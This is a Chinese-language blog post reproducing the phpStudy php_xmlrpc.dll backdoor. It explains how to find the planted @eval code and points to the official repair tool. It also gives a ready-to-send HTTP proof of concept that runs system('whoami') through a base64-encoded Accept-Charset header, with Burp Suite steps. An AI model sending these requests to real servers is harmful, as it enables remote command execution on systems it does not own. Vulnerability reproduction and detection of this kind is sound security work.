介绍

phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。

  • 软件作者声明:phpstudy 2016版PHP5.4存在后门。
  • 实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门

据传漏洞形成原因是官网被入侵后植入后门,嫌疑人已被抓。

咱也不敢说咱也不敢问

是个古老的问题了,我也不知道为什么今天出来水了一篇。。。

手动检查

后门代码存在于\ext\php_xmlrpc.dll模块中,phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在

工具检查并修复

官方发布了:phpstudy 安全自检修复程序,可用于2016 2018版本的安全检测与修复,下载该文件一键检查与修复。

浏览器访问靶机地址:http://192.168.1.91/

浏览器设置本地代理并且打开BurpSuiteFree抓包

POC:

GET / HTTP/1.1

Host: 192.168.43.99

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset:”commandbase64 string”

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

CTRL + R把请求包转发到中继器模块

Accept-Charset:”command base64 string”中执行命令经过了的的Base64编码加密:

执行语句指令:system(‘whoami’);

BASE64 编码后:c3lzdGVtKCd3aG9hbWknKTs =

替换进去

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

还要把“ ”中的前面的空格删除。Accept-Encoding: gzip, deflatedeflate

(6)构造好执行语句为WHOAMI的POC如下:

GET / HTTP/1.1

Host: 192.168.1.91

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

聪明的你应该知道要干嘛了。

咳咳咳,不过还是别干坏事,自己玩玩就好了。

这篇古老的复现就到这里了。。。

分类: CVE

天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

一人自负一阴阳,混沌分开气升降。炼阴仙客解冲虚,凡骨尤能化百族。雷域龙神启太元,天清升仙出浩渊。

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注